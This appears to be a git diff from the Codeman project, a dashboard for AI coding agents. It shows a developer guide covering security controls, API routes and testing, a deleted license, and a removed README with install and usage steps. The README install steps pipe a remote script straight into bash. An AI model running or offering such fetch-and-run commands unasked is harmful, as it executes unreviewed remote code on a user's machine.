| **Network bind** | Defaults to `127.0.0.1` (loopback). A non-loopback bind (`--host`/`CODEMAN_HOST`) without `CODEMAN_PASSWORD` **starts but warns loudly** (0.9.0; was fail-closed in COD-29/#107). `--allow-unauthenticated-network` / `CODEMAN_ALLOW_UNAUTHENTICATED_NETWORK=1` acknowledges the warning. Classifier: `network-auth-policy.ts` |
|
||||
| **Host guard** | Always-on Host-header allowlist blocks DNS rebinding (RCE on the default no-auth loopback install). Allows loopback, any IP literal, the bind host, `*.ts.net`/`*.trycloudflare.com`/`*.cfargotunnel.com`, the active managed tunnel, and `CODEMAN_ALLOWED_HOSTS`. ⚠️ **Custom reverse-proxy domains are rejected** unless added via `CODEMAN_ALLOWED_HOSTS=host,.suffix`. `registerHostGuard` in `server.ts`; policy in `network-auth-policy.ts` (`buildHostPolicy`/`isAllowedRequestHost`/`isAllowedRequestOrigin`) |
|
||||
| **CSRF / Origin** | Always-on cross-site Origin guard rejects state-changing requests from foreign origins (covers self-update, session create/input, settings/tunnel toggles). **A missing Origin is allowed** so curl/CLI and Claude Code hooks keep working. The global body parser keeps `text/plain` RAW (no auto-JSON-parse, which had enabled simple-request CSRF); `/api/crash-diag` self-parses. WebSocket upgrade validates Origin+Host (anti-CSWSH) in `ws-routes.ts`. Added in `c669518` (closes 2026-06-09 review CRITICALs) |
|
||||
| **QR Auth** | Single-use 6-char tokens (60s TTL) for tunnel login. See `docs/qr-auth-plan.md` |
|
||||
| **Sessions** | 24h cookie (`codeman_session`), auto-extend, device context audit |
|
||||
| **Rate limit** | 10 failed auth/IP → 429 (15min decay). QR has separate limiter |
|
||||
| **Hook bypass** | `/api/hook-event` (and `/api/status-telemetry`, the statusLine exporter) skip Basic auth (localhost-only, schema-validated). When auth is active (`CODEMAN_PASSWORD` set), the loopback bypass requires the per-instance `X-Codeman-Hook-Secret` header **unconditionally** — COD-54 introduced it tunnel-gated; COD-91 (PR #127) made it always-on because Codeman can't detect a user's own loopback reverse proxy (own cloudflared/`tailscale serve`/nginx → 127.0.0.1), closing that residual plain-bypass gap. Hook curls cat the secret file at exec time via `$CODEMAN_HOOK_SECRET_FILE` (session env, `config/hook-secret.ts`); a missing/wrong secret gets 401 and rate-limits in a dedicated bucket (never locks out login). Tunnel enable **refuses** without `CODEMAN_PASSWORD` unless exposure is acknowledged — via `CODEMAN_ALLOW_UNAUTHENTICATED_NETWORK=1` (env, COD-55) **or** the per-request `acknowledgeUnauthTunnel:true` action field (1.1.9): the welcome/settings tunnel toggle pops a security confirm dialog and, on confirm, resends with that flag (server logs a loud warning on every passwordless tunnel start; curl/API stay refused without password/env/flag). The flag is an action field, never persisted |
|
||||
| **Env vars** | `CODEMAN_MUX` (managed session), `CODEMAN_API_URL` (auto-set for hooks), `CODEMAN_ALLOWED_HOSTS` (extra Host/Origin allowlist entries for reverse proxies, comma-separated; bare `.suffix` matches subdomains) |
|
||||
| **Validation** | Zod schemas, path allowlist regex, env prefix allowlist (`CLAUDE_CODE_*`/`OPENCODE_*`/`CODEX_*`/`GEMINI_*`/`GOOGLE_*`) |
|
||||
| **Headers** | CORS localhost-only, CSP, X-Frame-Options, HSTS if HTTPS |
|
||||
|
||||
### SSE Event Registry
|
||||
|
||||
~133 event types in `src/web/sse-events.ts` (backend) and `SSE_EVENTS` in `constants.js` (frontend). Both must be kept in sync.
|
||||
|
||||
### API Routes
|
||||
|
||||
~166 handlers across 18 route files in `src/web/routes/`: system (45, incl. self-update `check`/`status`/`POST /api/system/update`, `POST /api/system/span-displays` → spawns `scripts/span-codeman.sh`, `GET /api/codex/status`, `GET /api/gemini/status`, and `GET /api/away-digest`), sessions (30, incl. `GET /api/sessions/unified`), orchestrator (10), cases (14, incl. remote hosts CRUD + remote case-link), ralph (9), plan (8), files (14, incl. attachment register + list/history + `:attachmentId/raw`/`preview`/`thumbnail` + workspace `file-preview`/`file-thumbnail`), respawn (7), mux (5), push (4), scheduled (4, legacy `ScheduledRun`), cron (9, cron-style `CronJob` jobs/runs), teams (2), search (1, `GET /api/search`), hooks (1), clipboard (1), status-telemetry (1, `POST /api/status-telemetry` ← statusLine exporter), ws (1 WebSocket). Each file has `@fileoverview` with endpoint details.
|
||||
|
||||
**HTTP contract** (stable since 0.9.x, see `docs/versioning-policy.md`; full envelope/status/error-code/SSE spec in `docs/api-reference.md`): responses use the `ApiResponse<T>` envelope — `{ success: true, data? }` or `{ success: false, error, errorCode }` (`src/types/api.ts`). `/api/v1/*` is a versioned alias of `/api/*` (URL rewrite in `server.ts`).
|
||||
|
||||
## Adding Features
|
||||
|
||||
- **API endpoint**: Types in `src/types/` domain file, route in `src/web/routes/*-routes.ts`. Return the `ApiResponse` envelope (`{ success: true, data }`; errors via `createErrorResponse()` with proper status code). Validate with Zod schemas in `schemas.ts`.
|
||||
- **SSE event**: Add to `src/web/sse-events.ts` + `SSE_EVENTS` in `constants.js`, emit via `broadcast()`, handle in `app.js` (`addListener(`)
|
||||
- **Session setting**: Add to `SessionState`, include in `session.toState()`, call `persistSessionState()`
|
||||
- **Hook event**: Add to `HookEventType`, add hook in `hooks-config.ts:generateHooksConfig()`, update `HookEventSchema`
|
||||
- **Mobile feature**: Add to relevant singleton, guard with `MobileDetection.isMobile()`
|
||||
- **New test**: Pick unique port (search `const PORT =`). Route tests use `app.inject()` (no port needed) — see `test/routes/_route-test-utils.ts`.
|
||||
|
||||
**Validation**: Zod v4 (different API from v3). Define schemas in `schemas.ts`, use `.parse()`/`.safeParse()`.
|
||||
|
||||
## State Files
|
||||
|
||||
All in `~/.codeman/`: `state.json` (sessions, settings, respawn, orchestrator, `cronJobs`/`cronJobRuns`), `mux-sessions.json` (tmux recovery), `settings.json` (user prefs), `push-keys.json` (VAPID), `push-subscriptions.json`, `session-lifecycle.jsonl` (audit log), `update-status.json` (self-updater progress, polled across the service restart), `linked-cases.json` (linked-case registry used for case-path resolution), `remote-hosts.json` + `remote-cases.json` (remote SSH hosts/cases, COD-94), `subagent-window-states.json` + `subagent-parents.json` (subagent window layout, GET/PUT `/api/subagent-window-states`/`-parents`), `hook-secret` (per-instance hook secret, COD-54), `certs/` (self-signed TLS for `--https`), `.env` (CODEMAN_USERNAME/PASSWORD fallback for the `codeman attach` CLI). Transient: `self-update-runner.sh`.
|
||||
|
||||
**Generated top-level dirs** (all gitignored — don't edit or commit): `dist/` (esbuild output), `out/`, `coverage/`, `test-results/`, `tmp/`, `screenshots-echo-diag/`. The committed gesture bundle (`src/web/public/gesture/gesture-codeman.js`) IS tracked, but its runtime wasm/model assets (`src/web/public/gesture/wasm/`, `*.task`) are fetched and gitignored.
|
||||
|
||||
## Testing
|
||||
|
||||
**Never run the bare full suite** (`npm test` with no file argument): the default config includes the browser-driven suites (`test/mobile/**` and 3 other Playwright tests), which need a live server + chromium + environment-specific PNG baselines and will fail/hang locally. Run individual files, or `test:ci` for a broad sweep:
|
||||
|
||||
```bash
|
||||
npm test -- test/<specific-file>.test.ts # Single file (SAFE, uses config/vitest.config.ts)
|
||||
npm test -- -t "pattern" # By name (SAFE)
|
||||
npm run test:ci # Everything except browser/perf suites — what CI runs
|
||||
# npm test # DON'T — includes browser/visual suites
|
||||
```
|
||||
|
||||
Raw `npx vitest` skips `config/vitest.config.ts`; always use `npm test --` or pass `--config config/vitest.config.ts`.
|
||||
|
||||
**Config**: Vitest with `globals: true`, `fileParallelism: false`. Timeout 30s, teardown 60s. `config/vitest.ci.config.ts` = same minus the browser/perf excludes — keep the two configs in sync when changing shared options.
|
||||
|
||||
**Tmux safety**: under vitest (`VITEST` env var, set automatically), `TmuxManager` no-ops ALL shell commands and becomes a pure in-memory mock — tests physically cannot create/kill/attach real tmux sessions (`IS_TEST_MODE` in `src/tmux-manager.ts`). `test/setup.ts` additionally strips `CODEMAN_PASSWORD`/`CODEMAN_USERNAME` (so auth state from the running instance can't leak into tests) and `CODEMAN_GESTURE` (a shell-exported gesture flag would flip render-injection assertions).
|
||||
|
||||
**Ports**: Pick unique ports manually. Search `const PORT =` before adding new tests.
|
||||
|
||||
**Respawn tests**: Use `MockSession` from `test/mocks/index.ts` (defined in `test/mocks/mock-session.ts`). **Route tests**: `app.inject({ method, url, payload })` in `test/routes/` — no live port needed. **Mobile tests**: Playwright suite in `test/mobile/` (135 device profiles). Browser-testing infra and practices: `docs/browser-testing-guide.md`.
|
||||
|
||||
## Debugging
|
||||
|
||||
```bash
|
||||
tmux list-sessions # List tmux sessions
|
||||
curl localhost:3000/api/sessions | jq # Check sessions
|
||||
curl localhost:3000/api/status | jq # Full app state
|
||||
curl localhost:3000/api/subagents | jq # Background agents
|
||||
cat ~/.codeman/state.json | jq # Persisted state
|
||||
```
|
||||
|
||||
Mobile screenshots: `~/.codeman/screenshots/`, accessed via `GET/POST /api/screenshots`.
|
||||
|
||||
## Performance & Limits
|
||||
|
||||
Target: 20 sessions, 50 agent windows at 60fps. Limits in `src/config/`: terminal 32MB (see below), text 1MB, messages 1000, max agents 500, max sessions 50, max SSE clients 100. **Terminal history** (`src/config/terminal-history.ts`, COD-80): tmux history-limit 100k lines, PTY buffer 32MB max / 24MB trim (env `CODEMAN_MAX_TERMINAL_BUFFER`/`CODEMAN_TRIM_TERMINAL_TO`; the env-derived trim is clamped ≤75% of max — trim ≥ max would disable `BufferAccumulator` trimming entirely = unbounded memory); browser xterm scrollback stays a separate hardcoded 50k (`DEFAULT_SCROLLBACK` in constants.js — 100k/tab is a mobile-memory hazard). Settings keys `terminalScrollbackLines`/`terminalBufferMaxBytes`/`terminalBufferTrimBytes` are schema-validated but inert (only `tmuxHistoryLimit` is wired live); `buffer-limits.ts` re-exports the defaults. Text/message limits are env-overridable too (`CODEMAN_MAX_TEXT_OUTPUT`/`CODEMAN_TRIM_TEXT_TO`/`CODEMAN_MAX_MESSAGES`). **Image upload** (`image-input.js` / `config/buffer-limits.ts`): up to `_maxBatchImages` 20 images/batch (bounded concurrency 3), per-file `MAX_PASTE_IMAGE_BYTES` 50MB (env `CODEMAN_MAX_PASTE_IMAGE_BYTES`); the mobile camera-roll picker auto-downscales to fit before upload. **HEIC paste uploads** (#151): converted server-side to JPEG in a `worker_threads` worker (`web/heic-jpeg-worker.ts`, resourceLimits + 30s timeout) gated by `runWithConversionLimit()`; detection is magic-byte based (covers Android/MIUI HEIFs mislabeled as JPEG); headers declaring > 64MP are rejected 415 BEFORE decode (decompression-bomb guard). Deps: `heic-decode` + `jpeg-js`. Use `LRUMap` for bounded caches, `StaleExpirationMap` for TTL cleanup. Anti-flicker pipeline: `docs/terminal-anti-flicker.md`.
|
||||
|
||||
**Memory leaks (24+ hour sessions)**: use `CleanupManager`, clear Maps in `stop()`, guard async with `if (this.cleanup.isStopped) return`. Frontend: store handler refs, clean in `close*()`. Verify: `npm test -- test/memory-leak-prevention.test.ts`.
|
||||
|
||||
## Scripts & Tunnel
|
||||
|
||||
Key scripts: `scripts/tmux-manager.sh` (safe tmux mgmt), `scripts/tunnel.sh [quick|named] start|stop|status|url` (quick = random trycloudflare URL, default; `named setup|enable` = fixed-hostname tunnel via `scripts/codeman-tunnel-named.service`; bare `start|stop|url` still means quick). Production services: `scripts/codeman-web.service`, `scripts/codeman-tunnel.service`. **Always set `CODEMAN_PASSWORD`** before exposing via tunnel.
|
||||
@@ -1,21 +0,0 @@
|
||||
MIT License
|
||||
|
||||
Copyright (c) 2024-2026 Codeman Contributors
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
||||
@@ -1,846 +1,5 @@
|
||||
<p align="center">
|
||||
<img src="docs/images/codeman-title.svg" alt="Codeman" height="60">
|
||||
</p>
|
||||
# design-assets
|
||||
|
||||
<h2 align="center">Mission control for AI coding agents</h2>
|
||||
Images referenced from GitHub Discussions and issues (design mockups, screenshots). Never merged into master; each directory is one discussion.
|
||||
|
||||
<p align="center">
|
||||
<em>Claude Code • OpenCode • Codex • Terminal - One Dashboard • Any Device</em>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/License-MIT-1e3a5f?style=flat-square" alt="License: MIT"></a>
|
||||
<a href="https://nodejs.org/"><img src="https://img.shields.io/badge/Node.js-22%2B-22c55e?style=flat-square&logo=node.js&logoColor=white" alt="Node.js 22+"></a>
|
||||
<a href="https://www.typescriptlang.org/"><img src="https://img.shields.io/badge/TypeScript-5.9-3b82f6?style=flat-square&logo=typescript&logoColor=white" alt="TypeScript 5.9"></a>
|
||||
<a href="https://fastify.dev/"><img src="https://img.shields.io/badge/Fastify-5.x-1e3a5f?style=flat-square&logo=fastify&logoColor=white" alt="Fastify"></a>
|
||||
<img src="https://img.shields.io/badge/Tests-2861%20total-22c55e?style=flat-square" alt="Tests">
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<strong>English</strong> • <a href="README.zh-CN.md">简体中文</a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/subagent-demo.gif" alt="Codeman — parallel subagent visualization" width="900">
|
||||
</p>
|
||||
|
||||
---
|
||||
|
||||
## Quick Start - Installation
|
||||
|
||||
```bash
|
||||
curl -fsSL https://raw.githubusercontent.com/Ark0N/Codeman/master/install.sh | bash
|
||||
```
|
||||
|
||||
This installs Node.js and tmux if missing, clones Codeman to `~/.codeman/app`, and builds it.
|
||||
|
||||
You'll need at least one AI coding CLI installed — [Claude Code](https://docs.anthropic.com/en/docs/claude-code), [OpenCode](https://opencode.ai), or [Codex](https://developers.openai.com/codex/cli) (any combination works). After install:
|
||||
|
||||
```bash
|
||||
codeman web
|
||||
# Open http://localhost:3000 and start your first session
|
||||
```
|
||||
|
||||
<details>
|
||||
<summary><strong>Run as a background service</strong></summary>
|
||||
|
||||
**Linux (systemd):**
|
||||
|
||||
```bash
|
||||
mkdir -p ~/.config/systemd/user
|
||||
cat > ~/.config/systemd/user/codeman-web.service << EOF
|
||||
[Unit]
|
||||
Description=Codeman Web Server
|
||||
After=network.target
|
||||
|
||||
[Service]
|
||||
Type=simple
|
||||
ExecStart=$(which node) $HOME/.codeman/app/dist/index.js web
|
||||
Restart=always
|
||||
RestartSec=10
|
||||
|
||||
[Install]
|
||||
WantedBy=default.target
|
||||
EOF
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now codeman-web
|
||||
loginctl enable-linger $USER
|
||||
```
|
||||
|
||||
**macOS (launchd):**
|
||||
|
||||
```bash
|
||||
mkdir -p ~/Library/LaunchAgents
|
||||
cat > ~/Library/LaunchAgents/com.codeman.web.plist << EOF
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
|
||||
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||
<plist version="1.0">
|
||||
<dict>
|
||||
<key>Label</key>
|
||||
<string>com.codeman.web</string>
|
||||
<key>ProgramArguments</key>
|
||||
<array>
|
||||
<string>$(which node)</string>
|
||||
<string>$HOME/.codeman/app/dist/index.js</string>
|
||||
<string>web</string>
|
||||
</array>
|
||||
<key>RunAtLoad</key><true/>
|
||||
<key>KeepAlive</key><true/>
|
||||
<key>StandardOutPath</key>
|
||||
<string>/tmp/codeman.log</string>
|
||||
<key>StandardErrorPath</key>
|
||||
<string>/tmp/codeman.log</string>
|
||||
</dict>
|
||||
</plist>
|
||||
EOF
|
||||
launchctl bootstrap gui/$(id -u) ~/Library/LaunchAgents/com.codeman.web.plist
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><strong>Windows (WSL)</strong></summary>
|
||||
|
||||
```powershell
|
||||
wsl bash -c "curl -fsSL https://raw.githubusercontent.com/Ark0N/Codeman/master/install.sh | bash"
|
||||
```
|
||||
|
||||
Codeman requires tmux, so Windows users need [WSL](https://learn.microsoft.com/en-us/windows/wsl/install). If you don't have WSL yet: run `wsl --install` in an admin PowerShell, reboot, open Ubuntu, then install your preferred AI coding CLI inside WSL ([Claude Code](https://docs.anthropic.com/en/docs/claude-code), [OpenCode](https://opencode.ai), or [Codex](https://developers.openai.com/codex/cli)). After installing, `http://localhost:3000` is accessible from your Windows browser.
|
||||
|
||||
</details>
|
||||
|
||||
---
|
||||
|
||||
## Using Codeman — A Human's Guide
|
||||
|
||||
A start-to-finish walkthrough for driving Codeman from the browser. If you just installed, this is where to begin.
|
||||
|
||||
### 1. Launch the server
|
||||
|
||||
```bash
|
||||
codeman web # localhost:3000 (loopback only — safe default)
|
||||
codeman web --port 8080 # custom port (or set CODEMAN_PORT)
|
||||
codeman web --https # self-signed TLS (only needed for remote access)
|
||||
codeman web -H 0.0.0.0 # bind LAN — REQUIRES CODEMAN_PASSWORD (see Security)
|
||||
```
|
||||
|
||||
Open the printed URL. The page is a single dashboard; everything below happens there.
|
||||
|
||||
### 2. Create your first session
|
||||
|
||||
Click **+ New Session** (or **Quick Start**). A session is one AI CLI running in its own tmux-backed terminal. You choose:
|
||||
|
||||
| Field | What it does |
|
||||
| ---------------------------- | ------------------------------------------------------------------------------------------------------------------- |
|
||||
| **Working directory / case** | The folder the agent operates in. A "case" is just a named working dir Codeman remembers. |
|
||||
| **CLI / run mode** | `Claude` (default), `OpenCode`, `Codex`, `Gemini`, or `Terminal` (plain shell). |
|
||||
| **Model** | Per-session model (App Settings → Claude Model). A soft default — `/model` still works in-session. |
|
||||
| **Effort / Ultracode** | Reasoning effort (`low`–`max`) or `ultracode` for dynamic multi-agent workflows. Switchable anytime with `/effort`. |
|
||||
|
||||
Hit start — Codeman spawns the CLI via a real PTY and streams it to your browser over SSE.
|
||||
|
||||
### 3. Read the dashboard
|
||||
|
||||
- **Tabs (top)** — one per session. `Alt+1`-`9` to jump, `Ctrl+Tab` for next, drag to reorder.
|
||||
- **Terminal (center)** — a real `xterm.js` terminal; full TUIs render correctly. Type directly and press **Enter** to send. `Shift+Enter` inserts a newline.
|
||||
- **Side panels** — Respawn, Ralph, Orchestrator, Cron, Subagents, Settings (toggled from the toolbar).
|
||||
|
||||
### 4. Talk to the agent
|
||||
|
||||
- **Type prompts** straight into the terminal — input is delivered exactly-once even across reconnects (a dropped link never loses or double-sends a prompt).
|
||||
- **Paste or drag-and-drop images** directly into the session.
|
||||
- **Voice input** — `Ctrl+Shift+V` (Deepgram Nova-3, with auto-silence stop).
|
||||
- **Attachments** — register external files/docs and preview Office/PDF inline.
|
||||
|
||||
### 5. Make it autonomous
|
||||
|
||||
| Mode | Use it for | Where |
|
||||
| ---------------- | --------------------------------------------------------------------------------------------------------------------------------- | ------------------ |
|
||||
| **Respawn** | Long unattended runs — auto-restarts the CLI on idle/limit, with adaptive timing. Presets: `solo-work`, `overnight-autonomous`, … | Respawn tab |
|
||||
| **Ralph / Todo** | A self-driving loop that tracks a todo list and keeps working until done. | Ralph tab |
|
||||
| **Orchestrator** | Turn one goal into a phased plan and drive it to completion across agents. | Orchestrator panel |
|
||||
| **Cron** | Saved, named jobs on a schedule (`once`/`interval`/`daily`/`weekly`) that spawn a session and send a prompt when due. | ⏰ Cron button |
|
||||
| **Auto-resume** | Automatically continue after a subscription rate-limit resets. | Respawn tab (top) |
|
||||
|
||||
### 6. Reach it from anywhere
|
||||
|
||||
- **Phone/tablet** — the UI is fully touch-optimized; scan the desktop **QR code** to log in without typing a password.
|
||||
- **Outside your network** — `./scripts/tunnel.sh start` opens a Cloudflare tunnel (set `CODEMAN_PASSWORD` first).
|
||||
- **SSH** — the `sc` chooser attaches to any session from a terminal (`sc` interactive, `sc 2` quick-attach, `sc -l` list).
|
||||
|
||||
### 7. Operate & maintain
|
||||
|
||||
- **App Settings** — model, effort, theme/skin, notifications, display toggles, per-CLI options.
|
||||
- **Self-update** — git-clone installs update in place from **Settings → Updates**.
|
||||
- **Deploy your own changes** — see [Development](#development).
|
||||
|
||||
> ⚠️ **Safety:** if you're working _inside_ a Codeman-managed session (`echo $CODEMAN_MUX` → `1`), never run `tmux kill-session` / `pkill claude` directly — use the web UI or `./scripts/tmux-manager.sh`.
|
||||
|
||||
---
|
||||
|
||||
## Mobile-Optimized Web UI
|
||||
|
||||
The most responsive AI coding agent experience on any phone. Full xterm.js terminal with local echo, swipe navigation, and a touch-optimized interface designed for real remote work — not a desktop UI crammed onto a small screen.
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-landing-qr.png" alt="Mobile — landing page with QR auth" width="260"></td>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-session-idle.png" alt="Mobile — idle session with keyboard accessory" width="260"></td>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-session-active.png" alt="Mobile — active agent session" width="260"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align="center"><em>Landing page with QR auth</em></td>
|
||||
<td align="center"><em>Keyboard accessory bar</em></td>
|
||||
<td align="center"><em>Agent working in real-time</em></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<th>Terminal Apps</th>
|
||||
<th>Codeman Mobile</th>
|
||||
</tr>
|
||||
<tr><td>200-300ms input lag over remote</td><td><b>Local echo — instant feedback</b></td></tr>
|
||||
<tr><td>Tiny text, no context</td><td>Full xterm.js terminal</td></tr>
|
||||
<tr><td>No session management</td><td>Swipe between sessions</td></tr>
|
||||
<tr><td>No notifications</td><td>Push alerts for approvals and idle</td></tr>
|
||||
<tr><td>Manual reconnect</td><td>tmux persistence</td></tr>
|
||||
<tr><td>No agent visibility</td><td>Background agents in real-time</td></tr>
|
||||
<tr><td>Copy-paste slash commands</td><td>One-tap <code>/init</code>, <code>/clear</code>, <code>/compact</code></td></tr>
|
||||
<tr><td>Password typing on phone</td><td><b>QR code scan — instant auth</b></td></tr>
|
||||
</table>
|
||||
|
||||
### Secure QR Code Authentication
|
||||
|
||||
Typing passwords on a phone keyboard is miserable. Codeman replaces it with **cryptographically secure single-use QR tokens** — scan the code displayed on your desktop and your phone is authenticated instantly.
|
||||
|
||||
Each QR encodes a URL containing a 6-character short code that maps to a 256-bit secret (`crypto.randomBytes(32)`) on the server. Tokens auto-rotate every **60 seconds**, are **atomically consumed on first scan** (replays always fail), and use **hash-based `Map.get()` lookup** that leaks nothing through response timing. The short code is an opaque pointer — the real secret never appears in browser history, `Referer` headers, or Cloudflare edge logs.
|
||||
|
||||
The security design addresses all 6 critical QR auth flaws identified in ["Demystifying the (In)Security of QR Code-based Login"](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin) (USENIX Security 2025, which found 47 of the top-100 websites vulnerable): single-use enforcement, short TTL, cryptographic randomness, server-side generation, real-time desktop notification on scan (QRLjacking detection), and IP + User-Agent session binding with manual revocation. Dual-layer rate limiting (per-IP + global) makes brute force infeasible across 62^6 = 56.8 billion possible codes. Full security analysis: [`docs/qr-auth-plan.md`](docs/qr-auth-plan.md)
|
||||
|
||||
### Touch-Optimized Interface
|
||||
|
||||
- **Keyboard accessory bar** — `/init`, `/clear`, `/compact` quick-action buttons above the virtual keyboard. Destructive commands (`/clear`, `/compact`) require a double-press to confirm — first tap arms the button, second tap executes — so you never fire one by accident on a bumpy commute
|
||||
- **Swipe navigation** — left/right on the terminal to switch sessions (80px threshold, 300ms)
|
||||
- **Smart keyboard handling** — toolbar and terminal shift up when keyboard opens (uses `visualViewport` API with 100px threshold for iOS address bar drift)
|
||||
- **Safe area support** — respects iPhone notch and home indicator via `env(safe-area-inset-*)`
|
||||
- **44px touch targets** — all buttons meet iOS Human Interface Guidelines minimum sizes
|
||||
- **Bottom sheet case picker** — slide-up modal replaces the desktop dropdown
|
||||
- **Native momentum scrolling** — `-webkit-overflow-scrolling: touch` for buttery scroll
|
||||
|
||||
```bash
|
||||
codeman web --https
|
||||
# Open on your phone: https://<your-ip>:3000
|
||||
```
|
||||
|
||||
> `localhost` works over plain HTTP. Use `--https` when accessing from another device, or use [Tailscale](https://tailscale.com/) (recommended) — it provides a private network so you can access `http://<tailscale-ip>:3000` from your phone without TLS certificates.
|
||||
|
||||
---
|
||||
|
||||
## Live Agent Visualization
|
||||
|
||||
Watch background agents work in real-time. Codeman monitors agent activity and displays each agent in a draggable floating window with animated Matrix-style connection lines back to the parent session.
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/subagent-spawn.png" alt="Subagent Visualization" width="900">
|
||||
</p>
|
||||
|
||||
- **Floating terminal windows** — draggable, resizable panels for each agent with a live activity log showing every tool call, file read, and progress update as it happens
|
||||
- **Connection lines** — animated green lines linking parent sessions to their child agents, updating in real-time as agents spawn and complete
|
||||
- **Status & model badges** — green (active), yellow (idle), blue (completed) indicators with Haiku/Sonnet/Opus model color coding
|
||||
- **Auto-behavior** — windows auto-open on spawn, auto-minimize on completion, tab badge shows "AGENT" or "AGENTS (n)" count
|
||||
- **Nested agents** — supports 3-level hierarchies (lead session -> teammate agents -> sub-subagents)
|
||||
|
||||
**Agent Teams** — first-class support for Claude Code's native multi-agent teams (`CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1`). `TeamWatcher` polls `~/.claude/teams/`, matches teammates to their lead session, and surfaces them as live subagent windows with **team-aware idle detection** — so the Respawn Controller won't fire while teammates are still working. See [`docs/agent-teams/`](docs/agent-teams/).
|
||||
|
||||
---
|
||||
|
||||
## Zero-Lag Input Overlay
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/zerolag-demo.gif" alt="Zerolag Demo — local echo vs server echo side-by-side" width="900">
|
||||
</p>
|
||||
|
||||
When accessing your coding agent remotely (VPN, Tailscale, SSH tunnel), every keystroke normally takes 200-300ms to round-trip. Codeman implements a **Mosh-inspired local echo system** that makes typing feel instant regardless of latency.
|
||||
|
||||
A pixel-perfect DOM overlay inside xterm.js renders keystrokes at 0ms. Background forwarding silently sends every character to the PTY in 50ms debounced batches, so Tab completion, `Ctrl+R` history search, and all shell features work normally. When the server echo arrives 200-300ms later, the overlay seamlessly disappears and the real terminal text takes over — the transition is invisible.
|
||||
|
||||
- **Ink-proof architecture** — lives as a `<span>` at z-index 7 inside `.xterm-screen`, completely immune to Ink's constant screen redraws (two previous attempts using `terminal.write()` failed because Ink corrupts injected buffer content)
|
||||
- **Font-matched rendering** — reads `fontFamily`, `fontSize`, `fontWeight`, and `letterSpacing` from xterm.js computed styles so overlay text is visually indistinguishable from real terminal output
|
||||
- **Full editing** — backspace, retype, paste (multi-char), cursor tracking, multi-line wrap when input exceeds terminal width
|
||||
- **Persistent across reconnects** — unsent input survives page reloads via localStorage
|
||||
- **Enabled by default** — works on both desktop and mobile, during idle and busy sessions
|
||||
|
||||
> Extracted as a standalone library: [`xterm-zerolag-input`](https://www.npmjs.com/package/xterm-zerolag-input) — see [Published Packages](#published-packages).
|
||||
|
||||
---
|
||||
|
||||
## Respawn Controller
|
||||
|
||||
The core of autonomous work. When the agent goes idle, the Respawn Controller detects it, sends a continue prompt, cycles context management commands for fresh context, and resumes — running **24+ hours** completely unattended.
|
||||
|
||||
```
|
||||
WATCHING → IDLE DETECTED → SEND UPDATE → /clear → /init → CONTINUE → WATCHING
|
||||
```
|
||||
|
||||
- **Multi-layer idle detection** — completion messages, AI-powered idle check, output silence, token stability
|
||||
- **Auto-resume on usage limit** _(opt-in, off by default)_ — when Claude halts on a subscription limit ("You've hit your limit · resets 3pm"), Codeman parses the reset time, waits it out plus a 2-minute safety buffer, then dismisses the rate-limit dialog and sends `continue` — so an overnight run survives the 5-hour window instead of stalling until morning. Recognizes every Claude Code limit-message format, retries if still limited, survives Codeman restarts, and holds respawn cycles while paused so `/clear` can't wipe the waiting conversation. Enable per session at the top of the Respawn tab
|
||||
- **Circuit breaker** — prevents respawn thrashing when Claude is stuck (CLOSED -> HALF_OPEN -> OPEN states, tracks consecutive no-progress and repeated errors)
|
||||
- **Health scoring** — 0-100 health score with component scores for cycle success, circuit breaker state, iteration progress, and stuck recovery
|
||||
- **Built-in presets** — `solo-work` (3s idle, 60min), `subagent-workflow` (45s, 240min), `team-lead` (90s, 480min), `ralph-todo` (8s, 480min), `overnight-autonomous` (10s, 480min)
|
||||
|
||||
---
|
||||
|
||||
## Orchestrator Loop
|
||||
|
||||
Beyond single-session respawn, the **Orchestrator** turns a high-level goal into a phased plan and drives it to completion across multiple agents — a state machine that runs `idle → planning → approval → executing → verifying → (replanning) → completed`.
|
||||
|
||||
- **Plan, then execute** — generates a phased plan from your goal and pauses for approval before touching anything; reject with feedback to regenerate
|
||||
- **Per-phase verification gates** — each phase is verified before the next begins; on failure the orchestrator replans instead of barreling ahead
|
||||
- **Multi-agent execution** — fans phases out to team agents / a task queue, coordinating work too big for one session
|
||||
